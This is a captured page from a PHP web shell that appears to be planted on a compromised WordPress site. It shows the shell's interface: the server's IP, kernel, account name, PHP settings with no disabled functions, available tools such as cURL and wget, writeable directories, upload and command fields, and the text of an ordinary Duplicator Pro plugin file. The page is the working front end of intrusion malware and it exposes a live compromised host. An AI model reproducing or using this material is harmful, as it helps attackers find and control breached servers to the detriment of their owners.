403Webshell
Server IP : 172.67.158.161  /  Your IP : 3.137.164.69
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/www/wp-content/plugins/duplicator-pro/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/www/wp-content/plugins/duplicator-pro/classes//class.package.pagination.php
<?php
if ( ! class_exists ( 'DUP_PRO_WP_List_Table' ) ) {
    require_once dirname(__FILE__) . '/class.wp.list.table.php';
}
add_filter( 'set-screen-option', 'DUP_PRO_Package_Screen::my_set_screen_option', 10, 3 );

/**
 * List table class
 */
class DUP_PRO_Package_Pagination extends DUP_PRO_WP_List_Table {
    function get_per_page(){
        return $this->get_items_per_page('duplicator_pro_opts_per_page');
    }
    function display_pagination($total_items,$per_page=10) {
        $this->set_pagination_args( array(
            'total_items' => $total_items,
            'per_page'    => $per_page
        ) );
        $which='top';
        $this->pagination( $which );
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit